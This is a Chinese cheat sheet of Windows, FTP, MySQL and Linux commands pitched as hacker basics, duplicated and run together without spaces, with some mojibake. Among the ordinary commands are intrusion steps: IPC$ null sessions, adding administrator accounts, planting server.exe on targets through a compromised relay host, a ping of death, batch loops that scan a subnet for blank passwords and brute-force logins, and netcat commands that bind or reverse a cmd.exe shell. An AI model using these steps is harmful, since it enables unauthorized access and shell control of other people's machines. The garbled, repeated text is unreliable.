netsendip"文本信息"向对方发信息netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc$开启ipc$共享netshareipc$/del删除ipc$共享netsharec$/del删除C:共享netuserguest12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstat-a查看开启了哪些端口,常用netstat-annetstat-n查看端口的网络连接情况,常用netstat-annetstat-v查看正在进行的工作netstat-p协议名例:netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)netstat-s查看正在使用的所有协议使用情况nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件二:del/S/Q目录或用:rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符路径要移动的文件名存放移动文件的路径移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fcone.txttwo.txt>3st.txt对比二个文件并把不同之处输出到3st.txt文件中,">"和">>"是重定向命令t/delete停止所有计划任务,用参数/yes则不需要确认就直接停止 atid号/delete停止某个已注册的计划任务at查看所有的计划任务at\iptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机fingerusername@host查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径文件名1路径文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copyc:srv.exe\ipadmin$复制本地c:srv.exe到对方的admin下cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy\ipadmin$svv.exec:或:copy\ipadmin$*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:server.exe登陆后,将“IP”的server.exe下载到目标主机c:server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送tftp-i对方IPputc:server.exe登陆后,上传本地c:server.exe至主机ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date/t、time/t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称=要指派给变量的字符设置环境变量set显示当前所有的环境变量setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量pause暂停批处理程序,并显示出:请按任意键继续.... if在批处理程序中执行条件处理(更多说明见if命令及变量)goto标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)call路径批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call/?)for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置echo信息在屏幕上显示出信息echo信息>>pass.txt将"信息"保存到pass.txt文件中findstr"Hello"aa.txt在aa.txt文件中寻找字符串hellofind文件名查找某文件title标题名字更改CMD窗口标题名字color颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白prompt名称更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky)print文件名打印文本文件三:ver在DOS窗口下显示版本信息winver弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format盘符/FS:类型格式化磁盘,类型:FAT、FAT32、NTFS,例:FormatD:/FS:NTFSmd目录名创建目录replace源文件要替换文件的目录替换文件ren原文件名新文件名重命名文件名tree以树形结构显示出目录,用参数-f将列出第个文件夹中文件名称type文件名显示文本文件的内容more文件名逐屏显示输出文件doskey要锁定的命令=字符doskey要解锁命令=为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskeydir=entsky(不能用doskeydir=dir);解锁:doskeydir=taskmgr调出任务管理器chkdsk/FD:检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误tlntadmntelnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口exit退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exepath路径可执行文件的文件名为可执行文件设置一个路径。 cmd启动一个win2K命令解释窗口。参数:/eff、/en关闭、开启命令扩展;更我详细说明见cmd/?regedit/s注册表文件名导入注册表;参数/S指安静模式导入,无任何提示;regedit/e注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D用户名:设定拒绝某用户访问;/P用户名:perm替换指定用户的访问权限;/G用户名:perm赋予指定用户访问权限;Perm可以是:N无,R读取,W写入,C更改(写入),F完全控制;例:caclsD:test.txt/Dpub设定d:test.txt拒绝pub用户访问。cacls文件名查看文件的访问用户权限列表REM文本内容在批处理文件中添加注解netsh查看或更改本地网络配置情况IIS服务命令:iisreset/reboot重启win2k计算机(但有提示系统将重启信息出现)iisreset/start或stop启动(停止)所有Internet服务iisreset/restart停止然后重新启动所有Internet服务iisreset/status显示所有Internet服务状态iisreset/enable或disable在本地系统上启用(禁用)Internet服务的重新启动iisreset/rebootonerror当启动、停止或重新启动Internet服务时,若发生错误将重新开机iisreset/noforce若无法停止Internet服务,将不会强制终止Internet服务iisreset/timeoutVal在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。FTP命令:(后面有详细说明内容)ftp的命令行格式为:ftp-v-d-i-n-g[主机名]-v显示远程服务器的所有响应信息。-d使用调试方式。-n限制ftp的自动登录,即不使用.netrc文件。-g取消全局文件名。help[命令]或?[命令]查看命令说明bye或quit终止主机FTP进程,并退出FTP管理方式.pwd列出当前远端主机目录put或send本地文件名[上传到主机上的文件名]将本地一个文件传送至远端主机中get或recv[远程主机文件名][下载到本地后的文件名]从远端主机中传送至本地主机中mget[remote-files]从远端主机接收一批文件至本地主机mputlocal-files将本地主机中一批文件传送至远端主机dir或ls[remote-directory][local-file]列出当前远端主机目录中的文件.如果有本bell每完成一次文件传送,报警提示cdup返回上一级目录 close中断与远程服务器的ftp会话(与open对应)openhost[port]建立指定ftp服务器连接,可指定连接端口delete删除远端主机中的文件mdelete[remote-files]删除一批文件mkdirdirectory-name在远端主机中建立目录rename[from][to]改变远端主机中的文件名rmdirdirectory-name删除远端主机中的目录status显示当前FTP的状态system显示远端主机系统类型useruser-name[password][account]重新以别的用户名登录远端主机openhost[port]重新建立一个新的连接prompt交互提示模式macdef定义宏命令lcd改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录chmod改变远端主机的文件权限case当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母cdremote-dir进入远程主机目录cdup进入远程主机目录的父目录!在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip五:MYSQL命令:mysql-h主机地址-u用户名-p密码连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。(例:mysql-h110.110.110.110-Uroot-P123456注:u与root可以不用加空格,其它也一样)exit退出MYSQLmysqladmin-u用户名-p旧密码password新密码修改密码grantselecton数据库.*to用户名@登录主机identifiedby"密码";增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)showdatabases;显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。usemysql;showtables;显示库中的数据表describe表名;显示数据表的结构createdatabase库名;建库use库名;createtable表名(字段设定列表);建表dropdatabase库名; droptable表名;删库和删表deletefrom表名;将表中记录清空select*from表名;显示表中的记录mysqldump--optschool>school.bbb备份数据库:(命令在DOS的\mysql\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。win2003系统下新增命令(实用部份):shutdown/参数关闭或重启本地或远程主机。参数说明:/S关闭主机,/R重启主机,/T数字设定延时的时间,范围0~180秒之间,/A取消开机,/M//IP指定的远程主机。例:shutdown/r/t0立即重启本地主机(无延时)taskill/参数进程名或进程的pid终止一个或多个任务和进程。参数说明:/PID要终止进程的pid,可用tasklist命令获得各进程的pid,/IM要终止的进程的进程名,/F强制终止进程,/T终止指定的进程及他所启动的子进程。tasklist显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。参数说明:/M列出当前进程加载的dll文件,/SVC显示出每个进程对应的服务,无参数时就只列出当前的进程。六:Linux系统下基本命令:要区分大小写uname显示版本信息(同win2K的ver)dir显示当前目录文件,ls-al显示包括隐藏文件(同win2K的dir)pwd查询当前所在的目录位置cdcd..回到上一层目录,注意cd与..之间有空格。cd/返回到根目录。cat文件名查看文件内容cat>abc.txt往abc.txt文件中写上内容。文件,就将结果写至本地文件more文件名以一页一页的方式显示一个文本文件。cp复制文件mv移动文件rm文件名删除文件,rm-a目录名删除目录及子目录mkdir目录名建立目录5黑客基础之DOS(最齐全)。rmdir删除子目录,目录内没有文档。chmod设定档案或目录的存取权限grep在档案中查找字符串diff档案文件比较 find档案搜寻date现在的日期、时间who查询目前和你使用同一台机器的人以及Login时间地点w查询目前上机者的详细资料whoami查看自己的帐号名称groups查看某人的Grouppasswd更改密码history查看自己下过的命令ps显示进程状态kill停止某进程gcc黑客通常用它来编译C语言写的文件su权限转换为指定使用者telnetIPtelnet连接对方主机(同win2K),当出现bash$时就说明连接成功。ftpftp连接上某服务器(同win2K)附:批处理命令与变量1:for命令及变量基本格式:FOR/参数%variableIN(set)DOcommand[command_parameters]%variable:指定一个单一字母可替换的参数,如:%i,而指定一个变量则用:%%i,而调用变量时用:%i%,变量是区分大小写的(%i不等于%I)。批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:netuse\ipipc$pass/user:user中ip为%1,pass为%2,user为%3(set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(11254)(1-1254),{“(11254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1-1254)”说明:即从254到1}command:指定对第个文件执行的命令,如:netuse命令;如要执行多个命令时,命令这间加:&来隔开command_parameters:为特定命令指定参数或命令行开关IN(set):指在(set)中取值;DOcommand:指执行command参数:/L指用增量形式{(set)为增量形式时};/F指从文件中不断取值,直到取完为止{(set)为文件时,如(d:pass.txt)时}。用法举例:@echooffecho用法格式:test.bat*.*.*>test.txt for/L%%Gin(11254)doecho%1.%%G>>test.txt&netuse\%1.%%G/user:administrator|find"命令成功完成">>test.txt存为test.bat说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的%1;%%G为变量(ip的最后一位);&用来隔开echo和netuse这二个命令;|指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G为完整的IP地址;(11254)指起始值,增长量,结止值。@echooffecho用法格式:ok.batipFOR/F%%iIN(D:user.dic)DOsmb.exe%1%%iD:pass.dic200存为:ok.exe说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。七:2:if命令及变量基本格式:IF[not]errorlevel数字命令语句如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。例:IFerrorlevel0命令指程序执行后返回的值为0时,就值行后面的命令;IFnoterrorlevel1命令指程序执行最后返回的值不等于1,就执行后面的命令。0指发现并成功执行(真);1指没有发现、没执行(假)。IF[not]字符串1==字符串2命令语句如果指定的文本字符串匹配(即:字符串1等于字符串2),就执行后面的命IF[not]errorlevel数字命令语句else命令语句或IF[not]字符串1==字符串2命令语句else命令语句或IF[not]exist文件名命令语句else命令语句加上:else命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else必须与if在同一行才有效。当有del命令时需把del命令全部内容用<>括起来,因为del命令要单独一行时才能执行,用上<>后就等于是单独一行了;例如:“ifexisttest.txt.elseechotest.txt.missing”,注意命令中的“.”(二)系统外部命令(均需下载相关工具):1、瑞士军刀:nc.exe参数说明:-h查看帮助信息-d后台模式-eprog程序重定向,一但连接就执行〔危险〕-isecs延时的间隔 -l监听模式,用于入站连接-L监听模式,连接天闭后仍然继续监听,直到CTR+C-nIP地址,不能用域名-ofilm记录16进制的传输-p[空格]端口本地端口号-r随机本地及远程端口-t使用Telnet交互方式-uUDP模式-v详细输出,用-vv将更详细-w数字timeout延时间隔-z将输入,输出关掉(用于扫锚时)基本用法:nc-nvv192.168.0.180连接到192.168.0.1主机的80端口nc-l-p80开启本机的TCP80端口并监听nc-nvv-w2-z192.168.0.180-1024扫锚192.168.0.1的80-1024端口nc-l-p5354-t-ec:winntsystem32cmd.exe绑定remote主机的cmdshell在remote的TCP5354端口nc-t-ec:winntsystem32cmd.exe192.168.0.25354梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口高级用法:nc-L-p80作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止nc-L-p80>c:log.txt作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txtnc-L-p80存放文件的路径及名称传送文件到对方主机备注:|管道命令<或>重定向命令。“<”,例如:tlntadmn>d:log.txt意思是:后台执行dir,并把结果存在d:log.txt中>与>>的区别">"指:覆盖;">>"指:保存到(添加到)。 如:@dirc:winnt>>d:log.txt和@dirc:winnt>d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。八:2、扫锚工具:xscan.exe基本格式xscan-host<起始IP>[-<终止IP>]<检测项目>[其他选项]扫锚"起始IP到终止IP"段的所有主机信息【真正的DOS命令大全】浏览次数:20894次悬赏分:100|解决时间:2009-7-3117:16|提问者:ieqtdh需要那种详细,全面的。最好把有用的没用的都收录在里面,既然是“大全”最主要就是个全字吗!要是比书上还全,本人追加分。最佳答案use\ipipc$""/user:""建立IPC空链接netuse\ipipc$"密码"/user:"用户名"建立IPC非空链接netuseh:\ipc$"密码"/user:"用户名"直接登陆后映射对方C:到本地为H:netuseh:\ipc$登陆后映射对方C:到本地为H:netuse\ipipc$/del删除IPC链接netuseh:/del删除映射对方到本地的为H:的映射netuser用户名密码/add建立用户netuserguest/active:yes激活guest用户netuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务nettime\目标ip查看对方时间nettime\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息netview查看本地局域网内开启了哪些共享netview\ip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务netsendip"文本信息"向对方发信息 netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc$开启ipc$共享netshareipc$/del删除ipc$共享netsharec$/del删除C:共享netuserguest12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstat-a查看开启了哪些端口,常用netstat-annetstat-n查看端口的网络连接情况,常用netstat-annetstat-v查看正在进行的工作netstat-p协议名例:netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)netstat-s查看正在使用的所有协议使用情况nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件(二)del/S/Q目录或用:rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符路径要移动的文件名存放移动文件的路径移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fcone.txttwo.txt>3st.txt对比二个文件并把不同之处输出到3st.txt文件中,">"和">>"是重定向命令atid号开启已注册的某个计划任务 at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止atid号/delete停止某个已注册的计划任务at查看所有的计划任务at\iptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机fingerusername@host查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径文件名1路径文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copyc:srv.exe\ipadmin$复制本地c:srv.exe到对方的admin下cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy\ipadmin$svv.exec:或:copy\ipadmin$*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:server.exe登陆后,将“IP”的server.exe下载到目标主机c:server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送tftp-i对方IPputc:server.exe登陆后,上传本地c:server.exe至主机ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date/t、time/t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称=要指派给变量的字符设置环境变量set显示当前所有的环境变量setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量 pause暂停批处理程序,并显示出:请按任意键继续....if在批处理程序中执行条件处理(更多说明见if命令及变量)goto标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)call路径批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call/?)for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置echo信息在屏幕上显示出信息echo信息>>pass.txt将"信息"保存到pass.txt文件中findstr"Hello"aa.txt在aa.txt文件中寻找字符串hellofind文件名查找某文件title标题名字更改CMD窗口标题名字color颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白prompt名称更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky)(三)ver在DOS窗口下显示版本信息winver弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format盘符/FS:类型格式化磁盘,类型:FAT、FAT32、NTFS,例:FormatD:/FS:NTFSmd目录名创建目录replace源文件要替换文件的目录替换文件ren原文件名新文件名重命名文件名tree以树形结构显示出目录,用参数-f将列出第个文件夹中文件名称type文件名显示文本文件的内容more文件名逐屏显示输出文件doskey要锁定的命令=字符doskey要解锁命令=为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskeydir=entsky(不能用doskeydir=dir);解锁:doskeydir=taskmgr调出任务管理器chkdsk/FD:检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误tlntadmntelnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口exit退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path路径可执行文件的文件名为可执行文件设置一个路径。cmd启动一个win2K命令解释窗口。参数:/eff、/en关闭、开启命令扩展;更我详细说明见cmd/?regedit/s注册表文件名导入注册表;参数/S指安静模式导入,无任何提示;regedit/e注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D用户名:设定拒绝某用户访问;/P用户名:perm替换指定用户的访问权限;/G用户名:perm赋予指定用户访问权限;Perm可以是:N无,R读取,W写入,C更改(写入),F完全控制;例:caclsD:test.txt/Dpub设定d:test.txt拒绝pub用户访问。cacls文件名查看文件的访问用户权限列表REM文本内容在批处理文件中添加注解netsh查看或更改本地网络配置情况(四)IIS服务命令:iisreset/reboot重启win2k计算机(但有提示系统将重启信息出现)iisreset/start或stop启动(停止)所有Internet服务iisreset/restart停止然后重新启动所有Internet服务iisreset/status显示所有Internet服务状态iisreset/enable或disable在本地系统上启用(禁用)Internet服务的重新启动iisreset/rebootonerror当启动、停止或重新启动Internet服务时,若发生错误将重新开机iisreset/noforce若无法停止Internet服务,将不会强制终止Internet服务iisreset/timeoutVal在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。FTP命令:(后面有详细说明内容)ftp的命令行格式为:ftp-v-d-i-n-g[主机名]-v显示远程服务器的所有响应信息。-d使用调试方式。-n限制ftp的自动登录,即不使用.netrc文件。-g取消全局文件名。help[命令]或?[命令]查看命令说明bye或quit终止主机FTP进程,并退出FTP管理方式.pwd列出当前远端主机目录put或send本地文件名[上传到主机上的文件名]将本地一个文件传送至远端主机中get或recv[远程主机文件名][下载到本地后的文件名]从远端主机中传送至本地主机中mget[remote-files]从远端主机接收一批文件至本地主机 mputlocal-files将本地主机中一批文件传送至远端主机dir或ls[remote-directory][local-file]列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件ascii设定以ASCII方式传送文件(缺省值)bin或image设定以二进制方式传送文件bell每完成一次文件传送,报警提示cdup返回上一级目录close中断与远程服务器的ftp会话(与open对应)openhost[port]建立指定ftp服务器连接,可指定连接端口delete删除远端主机中的文件mdelete[remote-files]删除一批文件mkdirdirectory-name在远端主机中建立目录rename[from][to]改变远端主机中的文件名rmdirdirectory-name删除远端主机中的目录status显示当前FTP的状态system显示远端主机系统类型useruser-name[password][account]重新以别的用户名登录远端主机openhost[port]重新建立一个新的连接prompt交互提示模式macdef定义宏命令lcd改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录chmod改变远端主机的文件权限case当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母cdremote-dir进入远程主机目录cdup进入远程主机目录的父目录!在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip(五)MYSQL命令:mysql-h主机地址-u用户名-p密码连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。(例:mysql-h110.110.110.110-Uroot-P123456注:u与root可以不用加空格,其它也一样)exit退出MYSQLmysqladmin-u用户名-p旧密码password新密码修改密码grantselecton数据库.*to用户名@登录主机identifiedby"密码";增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) showdatabases;显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用В导噬暇褪怯谜飧隹饨胁僮鳌?usemysql;showtables;显示库中的数据表describe表名;显示数据表的结构createdatabase库名;建库use库名;createtable表名(字段设定列表);建表dropdatabase库名;droptable表名;删库和删表deletefrom表名;将表中记录清空select*from表名;显示表中的记录mysqldump--optschool>school.bbb备份数据库:(命令在DOS的\mysql\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。win2003系统下新增命令(实用部份):shutdown/参数关闭或重启本地或远程主机。参数说明:/S关闭主机,/R重启主机,/T数字设定延时的时间,范围0~180秒之间,/A取消开机,/M//IP指定的远程主机。例:shutdown/r/t0立即重启本地主机(无延时)taskill/参数进程名或进程的pid终止一个或多个任务和进程。参数说明:/PID要终止进程的pid,可用tasklist命令获得各进程的pid,/IM要终止的进程的进程名,/F强制终止进程,/T终止指定的进程及他所启动的子进程。tasklist显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。参数说明:/M列出当前进程加载的dll文件,/SVC显示出每个进程对应的服务,无参数时就只列出当前的进程。(六)Linux系统下基本命令:要区分大小写uname显示版本信息(同win2K的ver)dir显示当前目录文件,ls-al显示包括隐藏文件(同win2K的dir)pwd查询当前所在的目录位置cdcd..回到上一层目录,注意cd与..之间有空格。cd/返回到根目录。cat文件名查看文件内容cat>abc.txt往abc.txt文件中写上内容。more文件名以一页一页的方式显示一个文本文件。cp复制文件mv移动文件 rm文件名删除文件,rm-a目录名删除目录及子目录mkdir目录名建立目录rmdir删除子目录,目录内没有文档。chmod设定档案或目录的存取权限grep在档案中查找字符串diff档案文件比较find档案搜寻date现在的日期、时间who查询目前和你使用同一台机器的人以及Login时间地点w查询目前上机者的详细资料whoami查看自己的帐号名称groups查看某人的Grouppasswd更改密码history查看自己下过的命令ps显示进程状态kill停止某进程gcc黑客通常用它来编译C语言写的文件su权限转换为指定使用者telnetIPtelnet连接对方主机(同win2K),当出现bash$时就说明连接成功。ftpftp连接上某服务器(同win2K)附:批处理命令与变量1:for命令及变量基本格式:FOR/参数%variableIN(set)DOcommand[command_parameters]%variable:指定一个单一字母可替换的参数,如:%i,而指定一个变量则用:%%i,而调用变量时用:%i%,变量是区分大小写的(%i不等于%I)。批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:netuse\ipipc$pass/user:user中ip为%1,pass为%2,user为%3(set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(11254)(1-1254),{“(11254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1-1254)”说明:即从254到1}command:指定对第个文件执行的命令,如:netuse命令;如要执行多个命令时,命令这间加:&来隔开command_parameters:为特定命令指定参数或命令行开关IN(set):指在(set)中取值;DOcommand:指执行command 